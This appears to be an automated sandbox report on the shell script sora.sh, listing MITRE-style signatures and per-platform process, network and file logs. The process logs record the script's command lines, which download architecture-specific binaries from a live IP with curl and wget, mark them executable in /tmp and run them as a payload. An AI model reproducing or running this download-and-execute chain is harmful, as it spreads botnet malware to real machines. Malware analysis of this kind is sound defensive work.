Malware Analysis Report

2025-01-23 15:15

Sample ID 240822-1l7ysszbmf
Target sora.sh
SHA256 19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902

Threat Level: Shows suspicious behavior

The file sora.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-22 21:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:50

Platform

debian12-armhf-20240418-en

Max time kernel

299s

Max time network

302s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-timedated.service-eNtkgh]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240418-en-5 udp
US 1.1.1.1:53 debian12-armhf-20240418-en-5 udp
US 1.1.1.1:53 debian12-armhf-20240418-en-5 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240418-en-5 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:50

Platform

debian12-mipsel-20240221-en

Max time kernel

300s

Max time network

298s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-timedated.service-vrdggE]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-mipsel-20240221-en-0 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-0 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-0 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-0 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:50

Platform

debian9-armhf-20240611-en

Max time kernel

300s

Max time network

286s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-806c12d3ba1b433dbef9e362c58cc6bf-systemd-timedated.service-yLlaTN]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

ubuntu2204-amd64-20240522.1-en

Max time kernel

295s

Max time network

297s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 1.1.1.1:53 security.ubuntu.com udp
US 1.1.1.1:53 _http._tcp.se.archive.ubuntu.com udp
US 1.1.1.1:53 security.ubuntu.com udp
US 1.1.1.1:53 se.archive.ubuntu.com udp
US 1.1.1.1:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
GB 185.125.190.81:80 security.ubuntu.com tcp
SE 194.71.11.163:80 se.archive.ubuntu.com tcp
US 8.8.8.8:53 _http._tcp.saimei.ftp.acc.umu.se udp
US 8.8.8.8:53 _http._tcp.chuangtzu.ftp.acc.umu.se udp
US 8.8.8.8:53 saimei.ftp.acc.umu.se udp
US 8.8.8.8:53 saimei.ftp.acc.umu.se udp
US 8.8.8.8:53 chuangtzu.ftp.acc.umu.se udp
US 8.8.8.8:53 chuangtzu.ftp.acc.umu.se udp
US 1.1.1.1:53 saimei.ftp.acc.umu.se udp
US 1.1.1.1:53 chuangtzu.ftp.acc.umu.se udp
US 1.1.1.1:53 chuangtzu.ftp.acc.umu.se udp
SE 194.71.11.167:80 chuangtzu.ftp.acc.umu.se tcp
US 8.8.8.8:53 saimei.ftp.acc.umu.se udp
US 8.8.8.8:53 saimei.ftp.acc.umu.se udp
SE 194.71.11.138:80 saimei.ftp.acc.umu.se tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

299s

Max time network

295s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x gdm3-config-err-QIRJD0 gdm3-config-err-wcrE8Z robben snap-private-tmp sora.sh systemd-private-63b463d3ddba46c5ba725f65aeb475e2-ModemManager.service-TEoeYq systemd-private-63b463d3ddba46c5ba725f65aeb475e2-colord.service-wvHScB systemd-private-63b463d3ddba46c5ba725f65aeb475e2-polkit.service-UYaRS8 systemd-private-63b463d3ddba46c5ba725f65aeb475e2-power-profiles-daemon.service-3glfDe systemd-private-63b463d3ddba46c5ba725f65aeb475e2-switcheroo-control.service-FGLkHU systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-logind.service-u4tSEY systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-oomd.service-tBUdsa systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-resolved.service-cCtFlD systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-timedated.service-BromBo systemd-private-63b463d3ddba46c5ba725f65aeb475e2-upower.service-GUSHRK]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x gdm3-config-err-QIRJD0 gdm3-config-err-wcrE8Z robben snap-private-tmp sora.sh systemd-private-63b463d3ddba46c5ba725f65aeb475e2-ModemManager.service-TEoeYq systemd-private-63b463d3ddba46c5ba725f65aeb475e2-colord.service-wvHScB systemd-private-63b463d3ddba46c5ba725f65aeb475e2-polkit.service-UYaRS8 systemd-private-63b463d3ddba46c5ba725f65aeb475e2-power-profiles-daemon.service-3glfDe systemd-private-63b463d3ddba46c5ba725f65aeb475e2-switcheroo-control.service-FGLkHU systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-logind.service-u4tSEY systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-oomd.service-tBUdsa systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-resolved.service-cCtFlD systemd-private-63b463d3ddba46c5ba725f65aeb475e2-upower.service-GUSHRK]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.59:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 91.189.91.81:80 security.ubuntu.com tcp
SE 194.71.11.165:80 se.archive.ubuntu.com tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:50

Platform

debian9-mipsbe-20240418-en

Max time kernel

300s

Max time network

283s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

